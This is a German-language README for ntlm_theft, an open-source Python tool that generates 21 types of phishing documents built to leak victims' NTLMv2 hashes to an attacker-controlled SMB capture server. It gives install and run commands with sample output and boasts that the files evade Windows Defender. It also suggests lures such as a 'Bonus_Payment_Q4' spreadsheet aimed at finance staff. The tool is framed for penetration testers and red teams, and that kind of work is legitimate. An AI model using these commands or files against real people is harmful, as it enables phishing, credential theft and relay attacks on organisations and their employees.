
Ein Werkzeug zum Erzeugen mehrerer Arten von NTLMv2-Hash-Diebstahldateien von Jacob Wilkin (Greenwolf)
Ein Tool zum Generieren mehrerer Arten von NTLMv2-Hash-Diebstahldateien.
ntlm_theft ist ein Open-Source-Python3-Tool, das 21 verschiedene Arten von Hash-Diebstahldokumenten generiert. Diese können für Phishing verwendet werden, wenn das Ziel entweder SMB-Datenverkehr außerhalb seines Netzwerks zulässt oder wenn Sie sich bereits im internen Netzwerk befinden.
Die Vorteile dieser Dateitypen gegenüber beispielsweise Makro-basierten Dokumenten oder Exploit-Dokumenten liegen darin, dass alle mit „beabsichtigter Funktionalität“ erstellt werden. Keine wurden von Windows Defender Antivirus im Juni 2020 gekennzeichnet, und 17 der 21 Angriffe funktionierten auf einem vollständig gepatchten Windows 10-Host.
ntlm_theft unterstützt die folgenden Angriffstypen:
ntlm_theft ist in erster Linie für Penetrationstester und Red Teams gedacht, die es für internes Phishing bei Mitarbeitern des Zielunternehmens oder zum Massentesten von Antiviren- und E-Mail-Gateways verwenden. Es kann auch für externes Phishing verwendet werden, wenn ausgehender SMB-Zugriff auf der Perimeter-Firewall erlaubt ist.
Ich fand es nützlich, während Penetrationstests schnell zu sehen, welche Dateitypen mir zur Verfügung stehen, anstatt Zeit mit der Konfiguration eines spezifischen Angriffs zu verbringen, wie es bei Red-Team-Einsätzen üblich wäre. Sie könnten eine .rtf- oder .docx-Datei an die Personalabteilung und eine .xlsx-Tabelle an die Finanzabteilung senden.
Diese Anleitung zeigt Ihnen die Voraussetzungen und die Verwendung von ntlm_theft.
ntlm_theft benötigt Python3 und xlsxwriter:
pip3 install xlsxwriter
Um das Tool zu starten, müssen 4 Parameter angegeben werden: ein Eingabeformat, die Eingabedatei oder der Eingabeordner und der grundlegende Ausführungsmodus:
-g, --generate : Wählen Sie, ob alle Dateien oder ein bestimmter Dateityp generiert werden sollen
-s, --server : Die IP-Adresse Ihres SMB-Hash-Erfassungsservers (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, usw.)
-f, --filename : Der Basisdateiname ohne Erweiterung, kann später umbenannt werden (z.B. test, Board-Meeting2020, Bonus_Payment_Q4)
Hier ist ein Beispiel für eine Ausführung, die alle Dateien generiert:
# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test
Created: test/test.scf (BROWSE)
Created: test/test-(url).url (BROWSE)
Created: test/test-(icon).url (BROWSE)
Created: test/test.rtf (OPEN)
Created: test/test-(stylesheet).xml (OPEN)
Created: test/test-(fulldocx).xml (OPEN)
Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: test/test-(includepicture).docx (OPEN)
Created: test/test-(remotetemplate).docx (OPEN)
Created: test/test-(frameset).docx (OPEN)
Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: test/test.asx (OPEN)
Created: test/test.jnlp (OPEN)
Created: test/test.application (DOWNLOAD AND OPEN)
Created: test/test.pdf (OPEN AND ALLOW)
Created: test/zoom-attack-instructions.txt (PASTE TO CHAT)
Generation Complete.

Hier ist ein Beispiel für eine Ausführung, die nur moderne Dateien generiert:
# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting
Skipping SCF as it does not work on modern Windows
Created: meeting/meeting-(url).url (BROWSE TO FOLDER)
Created: meeting/meeting-(icon).url (BROWSE TO FOLDER)
Created: meeting/meeting.rtf (OPEN)
Created: meeting/meeting-(stylesheet).xml (OPEN)
Created: meeting/meeting-(fulldocx).xml (OPEN)
Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: meeting/meeting-(includepicture).docx (OPEN)
Created: meeting/meeting-(remotetemplate).docx (OPEN)
Created: meeting/meeting-(frameset).docx (OPEN)
Created: meeting/meeting-(externalcell).xlsx (OPEN)
Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: meeting/meeting.asx (OPEN)
Created: meeting/meeting.jnlp (OPEN)
Created: meeting/meeting.application (DOWNLOAD AND OPEN)
Created: meeting/meeting.pdf (OPEN AND ALLOW)
Skipping zoom as it does not work on the latest versions
Skipping Autorun.inf as it does not work on modern Windows
Skipping desktop.ini as it does not work on modern Windows
Generation Complete.
Hier ist ein Beispiel für eine Ausführung, die nur eine xlsx-Datei generiert:
# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4
Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN)
Generation Complete.
ntlm_theft Erstellt von Jacob Wilkin Copyright (C) 2020 Jacob Wilkin
Dieses Programm ist freie Software: Sie können es weiterverbreiten und/oder modifizieren unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, entweder Version 3 der Lizenz oder (nach Ihrer Wahl) jeder späteren Version.
Dieses Programm wird in der Hoffnung bereitgestellt, dass es nützlich sein wird, aber OHNE JEGLICHE GEWÄHRLEISTUNG; sogar ohne die implizite Gewährleistung der MARKTGÄNGIGKEIT oder EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Siehe die GNU General Public License für weitere Details.